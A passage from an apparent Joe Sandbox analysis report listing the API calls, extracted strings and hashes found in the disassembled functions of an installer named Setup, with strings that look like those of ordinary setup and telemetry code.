                                                                                              • API String ID: 431132790-2988405606
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              APIs
                                                                                              • SqmCleanup.SQMAPI(?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D1E1C
                                                                                                • Part of subcall function 6C5D247C: LoadLibraryW.KERNEL32(advapi32,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D2484
                                                                                                • Part of subcall function 6C5D247C: GetProcAddress.KERNEL32(00000000,TraceMessage), ref: 6C5D24A1
                                                                                                • Part of subcall function 6C5D247C: GetProcAddress.KERNEL32(00000000,TraceMessageVa), ref: 6C5D24C0
                                                                                                • Part of subcall function 6C5D247C: FreeLibrary.KERNEL32(00000000,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D24D0
                                                                                                • Part of subcall function 6C5D2671: InitializeCriticalSectionAndSpinCount.KERNEL32(6C5F0168,00000FA0,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D268E
                                                                                                • Part of subcall function 6C5D2671: SetLastError.KERNEL32(00000000,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D26D1
                                                                                              • DisableThreadLibraryCalls.KERNEL32(?,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D19CE
                                                                                              Strings
                                                                                              • Microsoft\Windows\SoftwareQualityMetricsClient, xrefs: 6C5D19AC
                                                                                              Similarity
                                                                                              • API ID: Library$AddressProc$CallsCleanupCountCriticalDisableErrorFreeInitializeLastLoadSectionSpinThread
                                                                                              • String ID: Microsoft\Windows\SoftwareQualityMetricsClient
                                                                                              • API String ID: 1374315629-2483579846
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              APIs
                                                                                                • Part of subcall function 63960324: SendMessageW.USER32(?,00000437,00000000,?), ref: 63960344
                                                                                              • _memset.LIBCMT ref: 63950E62
                                                                                              • SendMessageW.USER32(?,00000444,00000001,00000074), ref: 63950E92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memset
                                                                                              • String ID: t
                                                                                              • API String ID: 1515505866-2238339752
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                                • Part of subcall function 6395F143: __EH_prolog3.LIBCMT ref: 6395F14A
                                                                                                • Part of subcall function 6395F0E8: __EH_prolog3.LIBCMT ref: 6395F0EF
                                                                                                • Part of subcall function 6395F092: __EH_prolog3.LIBCMT ref: 6395F099
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: .Parse error:$Invalid XML
                                                                                              • API String ID: 431132790-1700598720
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000040,00000000,00000000,6C5DBA57,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBAFB
                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E229A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                              • String ID: j
                                                                                              • API String ID: 439134102-2137352139
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961170
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 639611B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DirectorySystem
                                                                                              • String ID: C:\
                                                                                              • API String ID: 105093994-3404278061
                                                                                              APIs
                                                                                              Strings
                                                                                              • IDS_DOWNLOAD_PROGRESS_BAR_HEADER, xrefs: 63959A39
                                                                                              • IDS_FILE_VERIFICATION_PROGRESS_BAR_HEADER, xrefs: 63959A32
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: IDS_DOWNLOAD_PROGRESS_BAR_HEADER$IDS_FILE_VERIFICATION_PROGRESS_BAR_HEADER
                                                                                              • API String ID: 431132790-2780475424
                                                                                              APIs
                                                                                              Strings
                                                                                              • An internal or user error was encountered., xrefs: 6394C254, 6394C269
                                                                                              • A StopBlock was hit or a System Requirement was not met., xrefs: 6394C25B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: A StopBlock was hit or a System Requirement was not met.$An internal or user error was encountered.
                                                                                              • API String ID: 431132790-2578323181
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63951F88
                                                                                                • Part of subcall function 63951EB5: __EH_prolog3.LIBCMT ref: 63951EBC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Height$Width
                                                                                              • API String ID: 431132790-1965321196
                                                                                              APIs
                                                                                              • GetPropW.USER32(?,RotatingIconDisplayTHIS), ref: 6395A05F
                                                                                                • Part of subcall function 63959CD5: GetTickCount.KERNEL32 ref: 63959CDC
                                                                                              • SendMessageW.USER32(00000000,00000172,00000001,00000000), ref: 6395A07E
                                                                                              Strings
                                                                                              • RotatingIconDisplayTHIS, xrefs: 6395A057
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountMessagePropSendTick
                                                                                              • String ID: RotatingIconDisplayTHIS
                                                                                              • API String ID: 85587915-353257254
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63961E1C
                                                                                              • GetCommandLineW.KERNEL32(00000018,6395B187,00000000,?,?,6395AC46,?), ref: 63961E21
                                                                                                • Part of subcall function 6394BE03: __EH_prolog3.LIBCMT ref: 6394BE0A
                                                                                                • Part of subcall function 6394B9A7: __EH_prolog3.LIBCMT ref: 6394B9AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandLine
                                                                                              • String ID: showfinalerror
                                                                                              • API String ID: 1384747822-3200933950
                                                                                              APIs
                                                                                              • KillTimer.USER32(00000125,00000002), ref: 6395A031
                                                                                              • RemovePropW.USER32(00000125,RotatingIconDisplayTHIS), ref: 6395A03E
                                                                                              Strings
                                                                                              • RotatingIconDisplayTHIS, xrefs: 6395A037
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: KillPropRemoveTimer
                                                                                              • String ID: RotatingIconDisplayTHIS
                                                                                              • API String ID: 3686338637-353257254
                                                                                              • Opcode ID: ff42afd3e8e3aadc71200d05f8f7966453546ee8334b4fb8e85d4b38b715c48b
                                                                                              • Instruction ID: 6b0ce8011d72fd1858128ed1ac49d40d917dced7a4557f415b79fd6096c40ecc
                                                                                              • Opcode Fuzzy Hash: ff42afd3e8e3aadc71200d05f8f7966453546ee8334b4fb8e85d4b38b715c48b
                                                                                              • Instruction Fuzzy Hash: 72D01238004200EFEB217F50C80CB01BAB4BF47B86FA0C81CF492988B2C3BA84A4CF00
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5DAC0D
                                                                                              • EnterCriticalSection.KERNEL32(6C5F0168,00000000,?), ref: 6C5DAC9C
                                                                                              • LeaveCriticalSection.KERNEL32(6C5F0168), ref: 6C5DACFB
                                                                                              • SetLastError.KERNEL32(00000000), ref: 6C5DAD1E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterErrorLastLeavememset
                                                                                              • String ID:
                                                                                              • API String ID: 3008345650-0
                                                                                              • Opcode ID: f8295f219e60c9288a86d59c07c134dac88b2d966ea54d1e8d7658793fec878c
                                                                                              • Instruction ID: d56cb45d404693e75b3fdb2e3e8c5025e7720b8d5c7d0c232f8d20c71a572e79
                                                                                              • Opcode Fuzzy Hash: f8295f219e60c9288a86d59c07c134dac88b2d966ea54d1e8d7658793fec878c
                                                                                              • Instruction Fuzzy Hash: B4712631541349DBDB01DF18CC84F9B77B5EF84308F560495E9259AAA2C3B0ED88CF99